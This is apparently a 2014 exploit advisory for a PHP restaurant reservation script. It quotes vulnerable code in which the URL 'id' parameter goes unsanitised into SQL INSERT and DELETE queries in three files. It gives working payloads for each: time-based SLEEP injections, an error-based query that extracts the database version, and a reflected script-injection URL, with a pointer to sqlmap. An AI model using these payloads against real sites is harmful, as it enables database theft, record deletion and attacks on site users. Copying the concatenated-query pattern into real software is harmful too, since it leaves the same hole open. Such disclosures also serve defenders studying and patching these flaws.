facebook facebook twitter rss

©2014 RESTAURANT SCRIPT. ALL RIGHTS RESERVED - SQL Injection Vulnerabilty

Author: jsass , Published: 22-10-2014
# Exploit Title: ©2014 RESTAURANT SCRIPT. ALL RIGHTS RESERVED - SQL Injection Vulnerabilty
# Date : 22-10-2014
# Author : jsass
# Software Link:​ http://sourceforge.net/projects/restaurantmis/files/
# Version: ​1.00
# Tested on: kali linux
# Twitter : @KwSecurity
# Group : Q8 GRAY HAT TEAM

#########################################################################################################

SQL INJECTION

[1] billing-exec.php

code :

function clean($str) {
$str = @trim($str);
if(get_magic_quotes_gpc()) {
$str = stripslashes($str);
}
return mysql_real_escape_string($str);
}

//Sanitize the POST values
$StreetAddress = clean($_POST['sAddress']);
$BoxNo = clean($_POST['box']);
$City = clean($_POST['city']);
$MobileNo = clean($_POST['mNumber']);
$LandlineNo = clean($_POST['lNumber']);
// check if the 'id' variable is set in URL

// check if the 'id' variable is set in URL
if (isset($_GET['id']))
{
// get id value
$id = $_GET['id'];

//Create INSERT query
$qry = "INSERT INTO billing_details(member_id,Street_Address,P_O_Box_No,City,Mobile_No,Landline_No) VALUES('$id','$StreetAddress','$BoxNo','$City','$MobileNo','$LandlineNo')";
mysql_query($qry) ;


Exploit :
http://localhost/RSv1.0.0/billing-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8


[2] reserve-exec.php

function clean($str) {
$str = @trim($str);
if(get_magic_quotes_gpc()) {
$str = stripslashes($str);
}
return mysql_real_escape_string($str);
}

if(isset($_POST['table'])){
$table_id = clean($_POST['table']);
$table_flag = 1;
}
else if(isset($_POST['partyhall'])){
$partyhall_id = clean($_POST['partyhall']);
$partyhall_flag = 1;
}

if (isset($_GET['id'])){

//get user id
$id = $_GET['id'];

//Create INSERT query
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry);

//redirect to the reserve success page
header("location: reserve-success.php");

}else {
die("Reservation failed! Please try again after a few minutes.");
}


You Can Inject by time-based blind
Or Use Sqlmap ...

Exploit : http://localhost/RSv1.0.0/reserve-exec.php?id=1' AND SLEEP(5) AND 'Q8'='Q8


[3] delete-order.php



// check if the 'id' variable is set in URL
if (isset($_GET['id']))
{
// get id value
$id = $_GET['id'];

// delete the entry
$result = mysql_query("DELETE FROM orders_details WHERE order_id='$id'");
or die("The order does not exist ... \n");

// redirect back to the member index
header("Location: member-index.php");
}
else
// if id isn't set, redirect back to member index
{
header("Location: member-index.php");
}

time-based blind & boolean-based blind & error-based



Exploit : http://localhost/RSv1.0.0/delete-order.php?id=1' AND (SELECT 1414 FROM(SELECT COUNT(*),CONCAT(0x5138203e3e,Version(),0x3c3c205138,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Q8'='Q8


AND XSS

http://localhost/RSv1.0.0/delete-order.php?id=1'><script>alert('jsass')</script>


[4] reserve-exec.php


if(isset($_POST['table'])){
$table_id = clean($_POST['table']);
$table_flag = 1;
}
else if(isset($_POST['partyhall'])){
$partyhall_id = clean($_POST['partyhall']);
$partyhall_flag = 1;
}

$date = clean($_POST['date']);
$time = clean($_POST['time']);

//check if the id is set at the link
if (isset($_GET['id'])){

//get user id
$id = $_GET['id'];

//Create INSERT query
$qry = "INSERT INTO reservations_details(member_id,table_id,partyhall_id,Reserve_Date,Reserve_Time,table_flag,partyhall_flag) VALUES('$id','$table_id','$partyhall_id','$date','$time','$table_flag','$partyhall_flag')";
mysql_query($qry);

//redirect to the reserve success page
header("location: reserve-success.php");

}else {
die("Reservation failed! Please try again after a few minutes.");
}


Exploit : http://localhost/RSv1.0.0/reserve-exec.php?id=16' AND SLEEP(5) AND 'Q8'='Q8

#########################################################################################################

Greats : Sec4ever.com & alm3refh.com

Like us on Facebook :